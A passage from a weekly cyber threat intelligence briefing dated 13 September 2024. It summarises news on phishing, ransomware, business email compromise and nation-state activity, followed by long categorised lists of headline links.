Chinese gov’t mulls anti-money laundering law to ‘monitor’ new fintech
Chinese boffins claim Starlink signals can defeat stealth • The Register
Temu denies breach after hacker claims theft of 87 million data records (bleepingcomputer.com)
Russia
Putin really wants to put Trump back in the White House • The Register
Despite Russia warnings, critical infrastructure unprepared • The Register
Russian Secret Sub Unit Menaces Undersea Cables - Business Insider
US accuses RT, others of covert arms dealing, global influence operations | CyberScoop
RT News Hosted Russian Cyber Spy Unit, US Says (darkreading.com)
Russian troll farms turn up heat on presidential candidates | SC Media (scmagazine.com)
Malicious Actors Sow Discord With Election Compromise Claims (darkreading.com)
Russian threat groups shift attention to Harris-Walz campaign, researchers find | CyberScoop
'Marko Polo' Creates Globe-Spanning Cybercrime Juggernaut (darkreading.com)
Russian Security Firm Doctor Web Hacked - SecurityWeek
Iran
As Geopolitical Tensions Mount, Iran's Cyber Operations Grow (darkreading.com)
North Korea
Security Firm's North Korean Hacker Hire Not Unique (darkreading.com)
SecOps' new frontier in the remote work era: HR | TechTarget
North Korean APT Bypasses DMARC for Cyber Espionage (darkreading.com)
Tether and Others Freeze Millions Tied to Lazarus Group Wallets - DailyCoin
New North Korean Social Engineering Campaign Targets Crypto Sector | MSSP Alert
The Next US President Needs a New North Korea Strategy | The National Interest
Other Nation State Actors, Hacktivism, Extremism, Terrorism and Other Geopolitical Threat Intelligence
11 dead, thousands injured in explosive supply chain attack on Hezbollah pagers | Ars Technica
Explosive Pagers Reveal Major Security Breach Within Hezbollah (armyrecognition.com)
Mass pager attack in Lebanon raises concerns over cyber warfare and terrorism · Global Voices
UK activists file complaint with police against NSO Group • The Register
Key Predator spyware peddlers added to US sanctions list • The Register
Apple Abandons Spyware Suit to Avoid Sharing Cyber Secrets (darkreading.com)
Tools and Controls
Closing the gap between cyber risk strategy and execution (betanews.com)
Beyond A Buzzword: What Resilience in Cyber Really Means - IT Security Guru
1 in 10 firms dump infosec wares after Crowstrike outage • The Register
UK Data Centers Gain Critical Infrastructure Status, Raising Green Belt Controversy - SecurityWeek
Post-CrowdStrike Fallout: Microsoft Redesigning EDR Vendor Access to Windows Kernel - SecurityWeek
Security leaders consider banning AI coding due to security risks - Help Net Security
OODA Loop - Attacker VS Defender. Who Will Win the Race to Best Operationalize AI?
Why Pay A Pentester? (thehackernews.com)
SecOps' new frontier in the remote work era: HR | TechTarget
Over 2 million VPN passwords have been stolen – here's what you can do about it | TechRadar
Better metrics can show how cybersecurity drives business success | CSO Online
It's Time To Dismantle The Long Held Silos Between Security And Tech Teams (forbes.com)
How to reduce cyber risk during employee onboarding (bleepingcomputer.com)
Only 1/3 of businesses have 24/7 security coverage, survey finds | SC Media (scmagazine.com)
Striking the balance between cybersecurity and operational efficiency - Help Net Security
Organizations overwhelmed by numerous and insecure remote access tools - Help Net Security
DNS security best practices to implement now | TechTarget
What is Enterprise Attack Surface Management? | UpGuard
Is that photo real or AI? Google's 'About this image' aims to help you tell the difference | ZDNET
Want to get ahead? Four activities that can enable a more proactive security regime | CSO Online
Other News
When Startup Founders Should Be Thinking About Cybersecurity (darkreading.com)
73% Of Small Businesses Concerned About Cyber Security, New AMI Research Shows | Scoop News
Nearly half of UK businesses unequipped to face cyber attacks, Ipsos finds (holyrood.com)
TfL requires in-person password resets for 30,000 employees after hack (bleepingcomputer.com)
BT Report HUGE Rise in Malicious IP Scanners Across UK Network - ISPreview UK
The Cybersecurity Landscape: New Threats, Same Mistakes (darkreading.com)
Why are utilities especially vulnerable to cyberattacks? - Digital Journal
Increased Cybersecurity Essential For NGOs: Help Available (forbes.com)
Healthcare's Diagnosis is Critical: The Cure is Cybersecurity Hygiene (thehackernews.com)
Cybercrime in the Education Sector | MSSP Alert
Cyberattacks Are Huge Threat for All Manufacturers | ASSEMBLY (assemblymag.com)
Ports need to prepare for cyber attacks | News | Port Strategy
The rising threat of cyberattacks in the restaurant industry (securityintelligence.com)
Hospitality & Travel Cybersecurity: Protection the During Peak Seasons - Security Boulevard
Cyber threats to shipping explained | Pen Test Partners
Cybersecurity in the Skies - Avionics International (aviationtoday.com)
Vulnerability Management
Attackers are exploiting vulnerabilities at a record pace—here’s what to do about it | CSO Online
Insecure software makers are the real cyber villains – CISA • The Register
Patch management: A dull IT pain that won’t go away | CSO Online
The Ultimate Unseen Vulnerability in Addressing Cybersecurity Threats: Communication | HackerNoon
Is Microsoft really going to cut off security updates for your 'unsupported' Windows 11 PC? | ZDNET
CISA Releases Analysis of FY23 Risk and Vulnerability Assessments | CISA
Detecting vulnerable code in software dependencies is more complex than it seems - Help Net Security
The line between citizen developers and IT pros gets fuzzier - is that a problem? | ZDNET
Vulnerabilities
More details on that Windows Installer 'make me admin' hole • The Register
CISA warns of Windows flaw used in infostealer malware attacks (bleepingcomputer.com)
Google Chrome 129: new features and security fixes arrive on all platforms - gHacks Tech News
1 PoC Exploit for RCE Flaw, but 2 Patches From Veeam (darkreading.com)
Microsoft confirms second 0-day exploited by Void Banshee APT (CVE-2024-43461) - Help Net Security
SolarWinds Issues Patch for Critical ARM Vulnerability Enabling RCE Attacks (thehackernews.com)
Patch Issued for Critical VMware vCenter Flaw Allowing Remote Code Execution (thehackernews.com)
Medusa Ransomware Exploiting Fortinet Flaw For Sophisticated Attacks (cybersecuritynews.com)
VMware Releases Security Advisory for VMware Cloud Foundation and vCenter Server | CISA
Apple Vision Pro Vulnerability Exposed Virtual Keyboard Inputs to Attackers (thehackernews.com)
Windows vulnerability abused braille “spaces” in zero-day attacks (bleepingcomputer.com)
SolarWinds fixed critical RCE CVE-2024-28991 in Access Rights Manager (securityaffairs.com)
D-Link addressed three critical RCE in wireless router models (securityaffairs.com)
Apple Patches Major Security Flaws With iOS 18 Refresh - SecurityWeek
GitLab releases security updates to fix 17 vulnerabilities | Security Magazine
RCE Flaw in Google Cloud Affected Millions of Servers (darkreading.com)
Is Microsoft really going to cut off security updates for your 'unsupported' Windows 11 PC? | ZDNET
Atlassian Patches Vulnerabilities in Bamboo, Bitbucket, Confluence, Crowd - SecurityWeek
Sector Specific
Industry specific threat intelligence reports are available.
Contact us to receive tailored reports specific to the industry/sector and geographies you operate in.
· Automotive
· Construction
· Critical National Infrastructure (CNI)
· Defence & Space
· Education & Academia
· Energy & Utilities
· Estate Agencies
· Financial Services
· FinTech
· Food & Agriculture
· Gaming & Gambling
· Government & Public Sector (including Law Enforcement)
· Health/Medical/Pharma
· Hotels & Hospitality
· Insurance
· Legal
· Manufacturing
· Maritime & Shipping
· Oil, Gas & Mining
· OT, ICS, IIoT, SCADA & Cyber-Physical Systems
· Retail & eCommerce
· Small and Medium Sized Businesses (SMBs)
· Startups
· Telecoms
· Third Sector & Charities
· Transport & Aviation
· Web3
Contact us to help assess where your risks lie and to ensure you are doing all you can do to keep you and your business secure.
Look out for our ‘Cyber Tip Tuesday’ video blog and on our YouTube channel.
You can also follow us on Facebook, Twitter and LinkedIn.
Links to articles are for interest and awareness and linking to or reposting external content does not endorse any service or product, likewise we are not responsible for the security of external links.
Black Arrow Cyber Threat Briefing 13 September 2024
Black Arrow Cyber Threat Intelligence Briefing 13 September 2024:
-Trustwave Report Highlights Critical Cyber Threats to Financial Services Sector
-Old Habits, New Threats, Why More Phishing Attacks are Bypassing Technical Controls
-Prolific Threat Actor Group Scattered Spider Sets Sights on Finance, Insurance Firms’ Cloud Infrastructure
-Cyber Criminals Target Smaller Firms as Larger Companies Beef Up Security
-The Rise of Deepfakes Means CEOs Need to Rethink Trust
-What now? Ransomware Victim Pays Hacker, but Decryption Key Fails
-UK Regulator to Significantly Reduce Maximum Fraud Losses Banks are Forced to Cover
-Enterprise Mobile Devices See Increased Attacks
-Business Email Compromise Costs $55bn Over a Decade
-Half of IT Decision Makers Have Had to Recover Data from a Backup with a Third Unable to Make Full Recovery
-Insurers and Asset Managers Continue to Invest in Longer Term Cyber Security Planning: Moody’s
-Russia's Top-Secret Military Unit Reportedly Plots Undersea Cable 'Sabotage’
-Think You Could Never Fall Victim to Cyber Crime? Think Again
Welcome to this week’s Black Arrow Cyber Threat Briefing – a weekly digest, collated and curated by our cyber experts to provide senior and middle management with an easy to digest round up of the most notable threats, vulnerabilities, and cyber related news from the last week.
Top Cyber Stories of the Last Week
Trustwave Report Highlights Critical Cyber Threats to Financial Services Sector
Trustwave's latest research highlights significant cyber security challenges for the financial services sector, with ransomware and phishing emerging as major threats. The report found that 49% of attacks on financial institutions originated from phishing, while 24% of ransomware incidents were linked to a single threat actor group. Insider threats also pose a substantial risk, identified as the most costly type of data breach. The US was most affected, with 65% of ransomware attacks targeting its financial services. Trustwave emphasises the need for robust defences against these growing threats that include phishing-as-a-service and insider-driven breaches.
Old Habits, New Threats, Why More Phishing Attacks are Bypassing Technical Controls
Trust in Secure Email Gateways (SEGs) is waning, with 91% of cyber security leaders expressing frustration due to the increasing sophistication of phishing attacks. In the first quarter of 2024, 52% more attacks bypassed SEG detection, exploiting limitations in signature-based and reputation-based technologies. Techniques such as polymorphic attacks, compromised accounts, and social engineering have proven effective at evading legacy systems. With 68% of successful attacks passing all verification checks, experts recommend transitioning to integrated cloud email security solutions using AI and behavioural detection to better counter modern threats.
Prolific Threat Actor Group Scattered Spider Sets Sights on Finance, Insurance Firms’ Cloud Infrastructure
Scattered Spider, a hacking group targeting finance and insurance sectors, has intensified attacks on corporate cloud systems for data exfiltration and extortion, according to SC Media. They exploit exposed cloud access tokens on platforms like GitHub and purchase stolen credentials, focusing on services like Microsoft EntraID, AWS EC-2, and Okta. Smishing (text message) campaigns have also been used to infiltrate these systems, allowing attackers to demand ransoms and resell compromised credentials. Urgent implementation of multi-factor authentication and phishing awareness programmes are recommended, alongside the removal of private access tokens in developers' codes to mitigate risks.
Cyber Criminals Target Smaller Firms as Larger Companies Beef Up Security
Cyber criminals are increasingly targeting small and medium enterprises (SMEs), as larger organisations strengthen their cyber security measures and refuse to pay ransoms. In 2023, SMEs faced a significant rise in attacks where they accounted for nearly half of all incidents. While only 10% of large organisations paid ransoms, 44% of SMEs ended up paying between $25,000 and $100,000. The impact on SMEs, both financially and reputationally, can be devastating, with many struggling to recover from such cyber attacks.
The Rise of Deepfakes Means CEOs Need to Rethink Trust
Kroll’s recent report highlights a sharp rise in social engineering attacks, which have grown from 7% to 20% of all cyber security threats in just two quarters. Alarmingly, 43% of successful cyber attacks are now linked to social engineering, driven by the use of AI technologies like deepfakes. Corporate leaders are particularly vulnerable, with AI models capable of mimicking them using information freely available online. As businesses adjust to this new reality, CEOs must rethink the concept of trust and implement stronger measures to combat AI-enabled impersonation. This is an arms race that no one can avoid being a part of. What we can do is get smart about trust, and the first step to take is building the right context for it.
What now? Ransomware Victim Pays Hacker, but Decryption Key Fails
A security firm recently intervened in a ransomware attack involving the Hazard ransomware, where a company paid the ransom but received a faulty decryptor. A bug in the ransomware’s encryption process caused files to be doubly encrypted, leading to missing bytes necessary for decryption. Despite escalating the issue to the cyber criminals, no working solution was provided. The cyber firm’s researchers eventually resolved the issue using a brute-force method to recover the files. This case highlights the risks of paying ransoms, as unreliable decryptors are not uncommon. Best practices, including robust data backups, remain critical to mitigating ransomware incidents.
UK Regulator to Significantly Reduce Maximum Fraud Losses Banks are Forced to Cover
UK regulators are expected to reduce the proposed fraud reimbursement limit for banks and payment companies from £415,000 to £85,000, following concerns from ministers and fintech firms. The Payment Systems Regulator had initially planned the higher cap, but industry bodies like UK Finance warned it could lead to exploitation and harm smaller firms. In 2023, Britons lost £459 million to authorised push payment (APP) fraud, making the issue critical for consumer protection. A consultation on the lower limit is expected soon, aiming to balance protection for scam victims with industry sustainability.
Enterprise Mobile Devices See Increased Attacks
Lookout’s latest report on the mobile threat landscape reveals a 40% increase in mobile phishing attempts and malicious web attacks targeting enterprises. Over 80,000 malicious apps were detected on enterprise mobile devices, ranging from riskware to sophisticated spyware capable of stealing data and eavesdropping. The most common vulnerabilities are found in mobile browsers, with attackers exploiting unpatched versions. Lookout highlights that mobile device management (MDM) solutions, while essential, should be complemented by mobile threat defence (MTD) solutions to effectively safeguard against phishing and malware, particularly with Android being heavily targeted by spyware, trojans and other malware.
Business Email Compromise Costs $55bn Over a Decade
The FBI has warned organisations about the increasing threat of business email compromise (BEC), a form of social engineering responsible for nearly $55bn in losses globally between October 2013 and December 2023. Over 305,000 incidents were recorded, with scammers impersonating legitimate entities, such as suppliers or executives, to trick victims into transferring large sums. In 2023, BEC scams saw a 9% increase in global losses, often funnelling funds through UK and Hong Kong banks, third-party payment processors, or cryptocurrency exchanges. The FBI urges victims to contact their banks immediately if they detect fraudulent transfers.
Half of IT Decision Makers Have Had to Recover Data from a Backup with a Third Unable to Make Full Recovery
An annual survey of IT security decision makers in the UK found that 50% of respondents had to rely on backups following a cyber attack, with 25% only achieving partial data recovery and 8% failing due to weak backup systems. The findings highlight the need for stronger backup strategies, with 9% of organisations admitting their current systems are insufficient for rapid recovery. However, progress is evident, with automated backups to central and personal repositories rising to 30% in 2024, up from 19% in 2023. The report underscores the importance of robust backup solutions in today’s cyber threat landscape.
Insurers and Asset Managers Continue to Invest in Longer Term Cyber Security Planning: Moody’s
Moody’s recent report highlights that insurers and asset managers have significantly increased their cyber security investments, with spending rising by over 50% between 2019 and 2023 in response to the growing frequency of cyber attacks. The Americas saw the largest increase at 65%, followed by EMEA at 51% and APAC at 48%. Additionally, the share of IT budgets dedicated to cyber risk grew to 8% in 2023, and the number of cyber security employees rose by 23% from 2019 to 2022.
Russia's Top-Secret Military Unit Reportedly Plots Undersea Cable 'Sabotage’
US officials are increasingly concerned about Russia's naval activity near undersea cables, fearing potential sabotage by the General Staff Main Directorate for Deep Sea Research (GUGI). This unit, equipped with surface vessels, submarines, and naval drones, has reportedly been spotted near critical deep-sea infrastructure, raising alarms about the risk to fibre-optic cables that carry over 95% of international data. Sabotaging these cables could severely disrupt global communications. Recent reports also suggest Russian spy ships have been operating in Nordic waters, targeting both submarine cables and wind farms, further highlighting the growing threat.
Think You Could Never Fall Victim to Cyber Crime? Think Again
Bitdefender's 2024 Consumer Cybersecurity Assessment Report reveals that over 75% of individuals don’t believe they are targets for cyber criminals, with 37% convinced they aren't targeted at all. This misconception leaves people more vulnerable to cyber attacks, which can range from phishing and spyware to man-in-the-middle attacks. Hackers don’t just focus on large corporations; anyone can be a target, as personal information like email addresses and dates of birth hold value. Even experienced individuals can fall for scams, proving that everyone must remain vigilant against evolving threats, especially as attacks continue to grow in sophistication and scale.
Sources
https://securitybrief.co.nz/story/trustwave-highlights-critical-cyber-threats-to-financial-services
https://www.techspot.com/news/104700-ransomware-victim-paid-hacker-but-decryption-failed.html
https://www.ft.com/content/69611fac-03a2-4731-b12e-bf1583219270
https://betanews.com/2024/09/10/enterprise-mobile-devices-see-increased-attacks/
https://www.infosecurity-magazine.com/news/business-email-compromise-55bn/
https://www.theregister.com/2024/09/09/russia_readies_submarine_cable_sabotage/
https://www.makeuseof.com/how-everyone-is-potential-cybercrime-victim/
Governance, Risk and Compliance
Cybercriminals target SMEs as large companies beef up security - The Economic Times (indiatimes.com)
Businesses' preparedness against cyber threats beginning to shrink: Beazley - Reinsurance News
Global Study Finds Organizations Facing Cybersecurity Gaps (govtech.com)
Trustwave highlights critical cyber threats to financial services (securitybrief.co.nz)
How to Hire a CISO as Scrutiny Intensifies | Woodruff Sawyer - JDSupra
What savvy hiring execs look for in a CISO today | CSO Online
Cyber Staffing Shortages Remain CISOs' Biggest Challenge (darkreading.com)
Boards caught off guard as hackers exploit AI - CIR Magazine
Cyber threats put pressure on in-house legal chiefs (ft.com)
How to Strengthen and Improve Your Company's Security Posture - Security Boulevard
The Cybersecurity Cat-And-Mouse Game (forbes.com)
What are the cybersecurity trends shaping workforce management? | Business Law Donut
Cybersecurity Compliance and Beyond: How Protocols Drive Innovation and Growth - Security Boulevard
Building Security Culture: Taking Cybersecurity To Main Street | MSSP Alert
Threats
Ransomware, Extortion and Destructive Attacks
Ransomware demands exponentially increase, averaging $1.5 Million this year | TechRadar
Top Types Of Cyber Extortion Scams And 7 Ways To Stay Safe (forbes.com)
Ransomware: Attacks Once More Nearing Peak Levels | Symantec Enterprise Blogs (security.com)
What now? Ransomware victim pays hacker, but decryption key fails | TechSpot
RomCom Group Exploiting Microsoft Office 0-day To Deploy Ransomware (cybersecuritynews.com)
Ransomware rocked healthcare, public services in August | TechTarget
NoName ransomware gang deploying RansomHub malware in recent attacks (bleepingcomputer.com)
RansomHub Serves Up LaZagne (informationsecuritybuzz.com)
Updated attack arsenal bolsters RansomHub stealth | SC Media (scmagazine.com)
Threat Operation Behind Cicada3301 Ransomware Delivery Examined | MSSP Alert
How Law Enforcement's Ransomware Strategies Are Evolving (darkreading.com)
How Can Individuals Protect Themselves From Ransomware Attacks? (informationsecuritybuzz.com)
Most Educational Organizations Paid More Than the Original (globenewswire.com)
Meow ransomware sees surge of activity post-overhaul • The Register
Should State Governments Ban Ransomware Payments? (govtech.com)
Ransomware Victims
What now? Ransomware victim pays hacker, but decryption key fails | TechSpot
Ransomware rocked healthcare, public services in August | TechTarget
Hunters claims to have ransomed ICBC London, stolen 6.6TB • The Register
Healthcare giant settles patient data theft lawsuit for $65M • The Register
Cyber crooks shut down some US, UK schools • The Register
Charles Darwin School Bromley closes due to cyber attack | News Shopper
Cyber attack-hit Tewkesbury Borough Council 'rebuilding services' - BBC News
Significant ransom payment by major Iranian IT firm underway | SC Media (scmagazine.com)
Tewkesbury council says systems still down after cyber attack - BBC News
TfL Cyber Attack Raises Data Security Concerns - Hayes Connor
Amateurish 'CosmicBeetle' Ransomware Stings Turkish SMBs (darkreading.com)
Phishing & Email Based Attacks
72% of BEC attacks were from free webmail domains | Security Magazine
Losses due to cryptocurrency and BEC scams are soaring - Help Net Security
Think You Could Never Fall Victim to Cybercrime? Think Again (makeuseof.com)
FBI: Reported cryptocurrency losses reached $5.6 billion in 2023 (bleepingcomputer.com)
Phishing in focus: Disinformation, election and identity fraud - Help Net Security
Sextortion scam now use your "cheating" spouse’s name as a lure (bleepingcomputer.com)
Alert notification as phishing bait | Kaspersky official blog
Phishers abuse HTTP refresh headers for deeper deception • The Register
How to prevent vendor email compromise attacks | TechTarget
No, your partner didn't cheat on you. Well, at least, when this email said so - Neowin
Business Email Compromise (BEC)/Email Account Compromise (EAC)
72% of BEC attacks were from free webmail domains | Security Magazine
Losses due to cryptocurrency and BEC scams are soaring - Help Net Security
FBI: Reported cryptocurrency losses reached $5.6 billion in 2023 (bleepingcomputer.com)
How to prevent vendor email compromise attacks | TechTarget
Other Social Engineering
UK regulator to slash maximum fraud losses banks are forced to cover (ft.com)
Losses due to cryptocurrency and BEC scams are soaring - Help Net Security
Think You Could Never Fall Victim to Cybercrime? Think Again (makeuseof.com)
FBI: Reported cryptocurrency losses reached $5.6 billion in 2023 (bleepingcomputer.com)
Inside Thailand's $2 Billion Scam Industry Now Targeting Americans - Newsweek
Developers Beware: Lazarus Group Uses Fake Coding Tests to Spread Malware (thehackernews.com)
Sextortion scam now use your "cheating" spouse’s name as a lure (bleepingcomputer.com)
No, your partner didn't cheat on you. Well, at least, when this email said so - Neowin
Lured by a Promising Job, He Was Forced to Scam People - The New York Times (nytimes.com)
Watch Out for This New LinkedIn Job Scam (tech.co)
North Korean Threat Actors Deploy COVERTCATCH Malware via LinkedIn Job Scams (thehackernews.com)
Ongoing Lazarus Group campaign sets sights on blockchain pros | SC Media (scmagazine.com)
Artificial Intelligence
For security, we have to stop picking up the phone | TechCrunch
The Rise Of Deepfakes Means CEOs Need To Rethink Trust (forbes.com)
Why AI and Cybersecurity Are on a Collision Course (govtech.com)
US proposes requiring reporting for advanced AI, cloud providers (yahoo.com)
The Weaponization of AI and ML is Complicating the Digital Battlefield - Security Boulevard
Boards caught off guard as hackers exploit AI - CIR Magazine
Underground Demand for Malicious LLMs Is Robust (govinfosecurity.com)
Singapore moots legislation to outlaw use of deepfakes during elections | ZDNET
MI6 and CIA using Gen AI to combat tech-driven threats • The Register
AI cybersecurity needs to be as multi-layered as the system it's protecting - Help Net Security
Early adopters are deploying AI agents in the enterprise now, with scaled adoption in 2025 | ZDNET
2FA/MFA
6 ways hackers sidestep your two-factor authentication | PCWorld
WordPress Mandates Two-Factor Authentication for Plugin and Theme Developers (thehackernews.com)
Malware
US charges Russian military officers for unleashing wiper malware on Ukraine | Ars Technica
New malware shakes macOS security paradigm – hackers eying iPhones next | Cybernews
Google Users Warned Of Surging Malvertising Campaigns (searchenginejournal.com)
Beware Of Malicious Chrome Extension That Delivers Weaponized ZIP Archive (cybersecuritynews.com)
Developers Beware: Lazarus Group Uses Fake Coding Tests to Spread Malware (thehackernews.com)
Mustang Panda Feeds Worm-Driven USB Attack Strategy (darkreading.com)
How Remote Access Trojans Bypass Traditional Security Measures | HackerNoon
Threat Hunting Case Study: Uncovering FIN7 | Intel471
New Linux Malware Campaign Exploits Oracle Weblogic to Mine Cryptocurrency (thehackernews.com)
Earth Preta Evolves its Attacks with New Malware and Strategies | Trend Micro (US)
North Korean Threat Actors Deploy COVERTCATCH Malware via LinkedIn Job Scams (thehackernews.com)
Android TV Box Malware, Vo1d, Infects Over A Million Devices Worldwide (informationsecuritybuzz.com)
Mobile
Enterprise mobile devices see increased attacks (betanews.com)
SpyAgent Android malware steals your crypto recovery phrases from images (bleepingcomputer.com)
New malware shakes macOS security paradigm – hackers eying iPhones next | Cybernews
Found: 280 Android apps that use OCR to steal cryptocurrency credentials | Ars Technica
Samsung’s Update Decision—Bad News Confirmed For Millions Of Galaxy Users (forbes.com)
Denial of Service/DoS/DDOS
Internet of Things – IoT
Smart home security advice. Ring, SimpliSafe, Swann, and Yale | Pen Test Partners
Android TV Box Malware, Vo1d, Infects Over A Million Devices Worldwide (informationsecuritybuzz.com)
Data Breaches/Leaks
Data breach victims skyrocket over 1,100%: How to protect yourself - CyberGuy
Why is the world witnessing a surge in data breaches? (betanews.com)
Threat Actor Claims Fortinet Data Breach via Third-Party Service (cybersecuritynews.com)
Cyber-crook leaks 20GB of data 'stolen' from Capgemini • The Register
Fortinet Confirms Data Breach (informationsecuritybuzz.com)
Understanding the Types of Cybersecurity Breaches - Security Boulevard
Therapy Sessions Exposed by Mental Health Care Firm’s Unsecured Database | WIRED
Car rental company Avis discloses a data breach (securityaffairs.com)
Popular French retailers confirm hackers stole customer data (therecord.media)
Payment gateway data breach affects 1.7 million credit card owners (bleepingcomputer.com)
300,000 Impacted by Data Breach at Car Rental Firm Avis - SecurityWeek
Organised Crime & Criminal Actors
Think You Could Never Fall Victim to Cyber Crime? Think Again (makeuseof.com)
Cyber skills for sale: what leaders can learn from the dark web - Raconteur
Analysis of thousands of channels reveals Telegram is flooded with criminal networks | TechSpot
Russian, Kazakhstani men living in Miami indicted over cybercrime training service | CyberScoop
Inside Thailand's $2 Billion Scam Industry Now Targeting Americans - Newsweek
In Wake of Durov Arrest, Some Cybercriminals Ditch Telegram (404media.co)
Threat Hunting Case Study: Uncovering FIN7 | Intel471
Comms Business - BT logs 2,000 signals of potential cyber attacks per second
Evasion Tactics Used By Cybercriminals To Fly Under The Radar - SecurityWeek
FBI Cracks Down on Dark Web Marketplace Managed by Russian and Kazakh Nationals (thehackernews.com)
Chinese hackers linked to cybercrime syndicate arrested in Singapore (bleepingcomputer.com)
Lured by a Promising Job, He Was Forced to Scam People - The New York Times (nytimes.com)
Cambodian senator sanctioned by US over cyber-scams • The Register
Cryptocurrency/Cryptomining/Cryptojacking/NFTs/Blockchain
Losses due to cryptocurrency and BEC scams are soaring - Help Net Security
FBI: Reported cryptocurrency losses reached $5.6 billion in 2023 (bleepingcomputer.com)
Found: 280 Android apps that use OCR to steal cryptocurrency credentials | Ars Technica
Indodax hacked for $22 million, Lazarus Group suspected | Invezz
New Linux Malware Campaign Exploits Oracle Weblogic to Mine Cryptocurrency (thehackernews.com)
Ongoing Lazarus Group campaign sets sights on blockchain pros | SC Media (scmagazine.com)
Insider Risk and Insider Threats
Why is employee surveillance and tracking on the rise?
Insurance
Competition Fueled by Strong Cyber Insurance Profitability, Pricing Declines (claimsjournal.com)
Cyber threat needs public sector response (emergingrisks.co.uk)
Cyber insurance set for explosive growth - Help Net Security
62% of Businesses Filed a Cyber Insurance Claim in Last 12 Months | MSSP Alert
Supply Chain and Third Parties
Scattered Spider Sets Sights on Finance, Insurance Firms’ Cloud Infrastructure | MSSP Alert
Threat Actor Claims Fortinet Data Breach via Third-Party Service (cybersecuritynews.com)
One More Tool Will Do It? Reflecting on the CrowdStrike Fallout (thehackernews.com)
Think rebuild, not recovery, after a supply chain attack (betanews.com)
The Rising Tide of Software Supply Chain Attacks (darkreading.com)
Why the CrowdStrike outage hit Delta so hard | Fortune
Cloud/SaaS
Scattered Spider Sets Sights on Finance, Insurance Firms’ Cloud Infrastructure | MSSP Alert
US proposes requiring reporting for advanced AI, cloud providers (yahoo.com)
Cloud security fears, rising costs, privacy concerns? | ITPro
Shining a Light on Shadow Apps: The Invisible Gateway to SaaS Data Breaches (thehackernews.com)
Microsoft 365 was down for thousands of users - here's what happened | ZDNET
Why cloud security strategy is changing to prioritise recovery - Raconteur
Outages
One More Tool Will Do It? Reflecting on the CrowdStrike Fallout (thehackernews.com)
Microsoft 365 was down for thousands of users - here's what happened | ZDNET
Microsoft, Cyber Firms Pursue Changes After CrowdStrike Outage (claimsjournal.com)
Why the CrowdStrike outage hit Delta so hard | Fortune
Identity and Access Management
Encryption
Is Your Business Ready For The Quantum Cybersecurity Threat? (informationsecuritybuzz.com)
The Quantum Leap in Cybersecurity: A New Era of Challenges (eetimes.eu)
Edward Snowden made China a quantum networking superpower • The Register
Linux and Open Source
Linux and open-source documentation is a mess: Here's the solution | ZDNET
How to Explain the Security Advantages of Open Source - The New Stack
Passwords, Credential Stuffing & Brute Force Attacks
Credential Theft Protection: Defending Your Organization’s Data | MSSP Alert
How to defend against brute force and password spray attacks (bleepingcomputer.com)
The $13 billion problem: Tackling the growing sophistication of account takeovers (betanews.com)
Social Media
Analysis of thousands of channels reveals Telegram is flooded with criminal networks | TechSpot
In Wake of Durov Arrest, Some Cybercriminals Ditch Telegram (404media.co)
Opinion | The Tide May Be Turning for Telegram, TikTok and X - The New York Times (nytimes.com)
US arrests leaders of alleged Telegram terrorist group - BBC News
Watch Out for This New LinkedIn Job Scam (tech.co)
Malvertising
Google Users Warned Of Surging Malvertising Campaigns (searchenginejournal.com)
Google abusing ad tech dominance, UK competition watchdog finds - BBC News
Regulations, Fines and Legislation
US proposes requiring reporting for advanced AI, cloud providers (yahoo.com)
In Wake of Durov Arrest, Some Cybercriminals Ditch Telegram (404media.co)
How to Hire a CISO as Scrutiny Intensifies | Woodruff Sawyer - JDSupra
Opinion | The Tide May Be Turning for Telegram, TikTok and X - The New York Times (nytimes.com)
US arrests leaders of alleged Telegram terrorist group - BBC News
Google abusing ad tech dominance, UK competition watchdog finds - BBC News
Malaysia introduces a new Cyber Security Act | Herbert Smith Freehills | Global law firm
Backup and Recovery
Half of IT Leaders Faced Backup Recovery & One-Third Failed (itsecuritywire.com)
Careers, Working in Cyber and Information Security
Global Study Finds Organizations Facing Cybersecurity Gaps (govtech.com)
Building a career where you have the power to do the most good (siliconrepublic.com)
Cyber skills for sale: what leaders can learn from the dark web - Raconteur
Internships can be a gold mine for cybersecurity hiring | CSO Online
Cyber Staffing Shortages Remain CISOs' Biggest Challenge (darkreading.com)
Why Breaking into Cybersecurity Isn’t as Easy as You Think - Security Boulevard
Mind the talent gap: Infosec jobs abound, but hiring is flat • The Register
10 Writing Tips for Cybersecurity Professionals (darkreading.com)
Law Enforcement Action and Take Downs
Russian, Kazakhstani men living in Miami indicted over cybercrime training service | CyberScoop
In Wake of Durov Arrest, Some Cybercriminals Ditch Telegram (404media.co)
US arrests leaders of alleged Telegram terrorist group - BBC News
How Law Enforcement's Ransomware Strategies Are Evolving (darkreading.com)
17-year-old arrested in connection with cyber attack on TfL | UK News | Sky News
Arrest made in NCA investigation into Transport for London cyber attack - National Crime Agency
FBI Cracks Down on Dark Web Marketplace Managed by Russian and Kazakh Nationals (thehackernews.com)
Chinese hackers linked to cybercrime syndicate arrested in Singapore (bleepingcomputer.com)
Misinformation, Disinformation and Propaganda
Russia’s election influence efforts show sophistication, officials say - The Washington Post
Russia focusing on US social media stars to covertly influence voters | Reuters
‘Guerrilla projects’: Russia revels in US allegations of media warfare | Media News | Al Jazeera
Phishing in focus: Disinformation, election and identity fraud - Help Net Security
The US is Preparing Criminal Charges in Iran Hack Targeting Trump, AP Sources Say - SecurityWeek
Cybersecurity, disinformation dominates hearing on elections | CyberScoop
Russia Trying to Sway Voters Toward Trump Using Influencers: Official - Business Insider
Gallup Poll Bugs Open Door to Election Misinformation (darkreading.com)
Nation State Actors, Advanced Persistent Threats (APTs), Cyber Warfare, Cyber Espionage and Geopolitical Threats/Activity
Cyber Warfare and Cyber Espionage
The Biggest Cyber Warfare Attacks In Global Geopolitics (informationsecuritybuzz.com)
The Weaponization of AI and ML is Complicating the Digital Battlefield - Security Boulevard
Nation State Actors
China
Mustang Panda Feeds Worm-Driven USB Attack Strategy (darkreading.com)
Experts Identify 3 Chinese-Linked Clusters Behind Cyberattacks in Southeast Asia (thehackernews.com)
Chinese Tag Team APTs Keep Stealing Asian Gov't Secrets (darkreading.com)
Earth Preta Evolves its Attacks with New Malware and Strategies | Trend Micro (US)
TIDRONE Espionage Group Targets Taiwan Drone Makers in Cyber Campaign (thehackernews.com)
Edward Snowden made China a quantum networking superpower • The Register
House Committee Warns of Chinese Cranes' Threat to U.S. Port Security (gcaptain.com)
Hunters claims to have ransomed ICBC London, stolen 6.6TB • The Register
Chinese hackers linked to cybercrime syndicate arrested in Singapore (bleepingcomputer.com)
Portuguese government to continue ban on Chinese 5G equipment (techmonitor.ai)
Russia
